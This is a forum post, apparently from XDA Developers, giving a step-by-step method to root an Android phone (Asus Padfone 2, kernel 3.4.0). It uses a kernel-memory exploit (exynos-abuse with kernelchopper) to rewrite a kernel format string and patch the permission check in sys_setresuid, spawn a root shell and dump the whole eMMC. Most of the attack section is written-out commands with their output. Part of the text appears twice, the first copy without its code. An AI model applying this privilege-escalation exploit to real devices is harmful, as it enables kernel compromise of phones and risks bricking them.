Here is an open-source method to root your phone (with adb enabled), based on:
- 300 lines of C code I attached to http://forum.xda-developers.com/show...7&postcount=14
- an ARM compilator to compile this code, if you do not want to trust my resulting binaries attached to http://forum.xda-developers.com/show...7&postcount=14
- any apk with a terminal you trust (I use Install Terminal IDE, Terminal Emulator will do).
- any busybox you trust (I use the one from Terminal IDE).
- a computer with the android developpement package, I used adt-bundle-linux-x86-20130729
STEP 0: You may apply this on any Android system on your own risks. If your output of any instruction is not exactly as shown here, you should adapt following instructions accordingly (following color codes, and counting underlined words in hexadecimal notation), or better quit. If you do not get exactly all the outputs I colored here in red, you should QUIT or change previous instructions.
If you have no internal microSD, I suggest to you to first chdir a directory of you computer which can host one file of size >4Gb (3898777809 bytes for my padfone 2, the day I bought it).
STEP 1: finding s_show->seq_printf format string (in example given found at: 0x80c281c6).
Open terminal IDE, select "install system". You do not need to "install gcc". The select the first menu item named "terminal IDE", and type at its prompt:
We now use adb to put all attached files (unzipped) in /data/data/com.spartacusrex.spartacuside/files. The /usr/bin/script command is specific to linux; if you do not have it, it would be more difficult to make bug reports, and you will need a microSD card, or an USB disc plugged into your android.
Notice that /proc/kallsyms now gives offsets instead of 00000000.
STEP 2: patching sys_setresuid, applying manually exynos-abuse.c (found at 0x802856f0, which is 0x00856f0 plus 80208000). You should replace the underlined lone 8 by the number of bytes underlined, before the 00 00 50 e3 ...
STEP 3: getting a root shell.
And you are root until end of connexion by adb. I strongly suggest to you to make the first true backup, to have a chance to restore phone to current state. With an internal microSD, you can type:
To exploit this file, you will need kpartx.
If you have NO internal microSD, try a network drive; or if you can wait a full day (like me), you can do:
The result will be shown on current window, so you have better hide it once it works. I had a performance of 400kb/s with hidden xterm.
You will then be able to recover its content with
You may now install /system/xbin/su, eventually renamed to avoid exposing su to malware.
Here is my firmware.
If you need help, please type up-arrow repeatedly, down-arrow repeatedly, then provide the file backup_before_installing_su_to_diskreal.
Credits to alephzain for original version of exynos-abuse.c, SW686 for kernelchopper.c, spartacusrex for Google-Play's Terminal IDE.
This was tested independently here, and the first version of this post was made in the same thread.
Please suggest tags, this is the first thread I open.
- 300 lines of C code I attached to http://forum.xda-developers.com/show...7&postcount=14
- an ARM compilator to compile this code, if you do not want to trust my resulting binaries attached to http://forum.xda-developers.com/show...7&postcount=14
- any apk with a terminal you trust (I use Install Terminal IDE, Terminal Emulator will do).
- any busybox you trust (I use the one from Terminal IDE).
- a computer with the android developpement package, I used adt-bundle-linux-x86-20130729
STEP 0: You may apply this on any Android system on your own risks. If your output of any instruction is not exactly as shown here, you should adapt following instructions accordingly (following color codes, and counting underlined words in hexadecimal notation), or better quit. If you do not get exactly all the outputs I colored here in red, you should QUIT or change previous instructions.
If you have no internal microSD, I suggest to you to first chdir a directory of you computer which can host one file of size >4Gb (3898777809 bytes for my padfone 2, the day I bought it).
STEP 1: finding s_show->seq_printf format string (in example given found at: 0x80c281c6).
Open terminal IDE, select "install system". You do not need to "install gcc". The select the first menu item named "terminal IDE", and type at its prompt:
Code:
chmod 1777 /data/data/com.spartacusrex.spartacuside/files ; cp system/bin/busybox grep ; chmod 755 grepCode:
script backup_before_installing_su_to_disk
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/kernelchopper /data/data/com.spartacusrex.spartacuside/files
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb push /tmp/exynos-abuse-static /data/data/com.spartacusrex.spartacuside/files
adt-bundle-linux-x86-20130729/sdk/platform-tools/adb shell
cd /data/data/com.spartacusrex.spartacuside/files
./grep -l . /dev/graphics/fb0
/dev/graphics/fb0
./grep Kernel /proc/iomem
80208000-80d9e39f : Kernel code
80f04000-8128184b : Kernel data
./kernelchopper d 80208000 c00000 | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 70 4b 20 25 63 20 25 73 0a 00\|: 4b 20 25 63 20 25 73 0a 00\|: 20 25 63 20 25 73 0a 00\|: 25 63 20 25 73 0a 00\|: 63 20 25 73 0a 00\|25 70 4b 20 25 63 20 25 73 0a $\|25 70 4b 20 25 63 20 25 73 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 25 $\|25 70 4b 20 25 63 20 $\|25 70 4b 20 25 63 $' | ./grep -C 1 '25 70 4b 20 25 63 20 25 73 0a 00\|: 20 25 73 0a 00\|: 25 73 0a 00\|: 73 0a 00\|: 0a 00\|: 00\|25 70 4b 20 25 $\|25 70 4b 20 $\|25 70 4b $\|25 70 4b $\|25 70 $\|25 $'
80c281c0: 5b 25 73 5d 0a 00 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d 80c281c0 20
80c281c0: 5b 25 73 5d 0a 00 25 70 4b 20 25 63 20 25 73 0a
80c281d0: 00 6b 61 6c 6c 73 79 6d 73 00 2b 25 23 6c 78 2f
./kernelchopper d 80c281c6 b
80c281c6: 25 70 4b 20 25 63 20 25 73 0a 00
./kernelchopper m 80c281c6
204b7025
./grep sys_setresuid /proc/kallsyms
00000000 T sys_setresuid
00000000 T sys_setresuid16
./kernelchopper m 80c281c6 20207025
./kernelchopper m 80c281c6
20207025
./grep sys_setresuid /proc/kallsyms
c00856f0 T sys_setresuid
c00b7318 T sys_setresuid16STEP 2: patching sys_setresuid, applying manually exynos-abuse.c (found at 0x802856f0, which is 0x00856f0 plus 80208000). You should replace the underlined lone 8 by the number of bytes underlined, before the 00 00 50 e3 ...
Code:
./kernelchopper d 802856f0 80 | ./grep '00 00 50 e3\|20 00 00 ea'
80285720: 04 72 93 e5 a7 da ff eb 00 00 50 e3 20 00 00 ea
./kernelchopper d 80285728 8
80285728: 00 00 50 e3 20 00 00 ea
./kernelchopper m 80285728
e3500000
./kernelchopper m 80285728 e3500001Code:
./exynos-abuse-static
2000@android:/data/data/com.spartacusrex.spartacuside/files # /system/bin/id
uid=0(root) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)Code:
cp grep bzip2
./bzip2 -c < /dev/block/mmcblk0 > /Removable/Storage1/backup.bz2If you have NO internal microSD, try a network drive; or if you can wait a full day (like me), you can do:
Code:
cp grep bzip2
cp grep uuencode
./bzip2 -c < /dev/block/mmcblk0 | ./uuencode -You will then be able to recover its content with
Code:
LANG= grep -aA99999999 '^begin 666 -' < backup_before_installing_su_to_diskreal | uudecode -o backup.bz2Here is my firmware.
Code:
Android version: 4.1.1, 3.4.0-perf-g64..., M3.13.30-A68_101034 [Jan 22 2013]Credits to alephzain for original version of exynos-abuse.c, SW686 for kernelchopper.c, spartacusrex for Google-Play's Terminal IDE.
This was tested independently here, and the first version of this post was made in the same thread.
Please suggest tags, this is the first thread I open.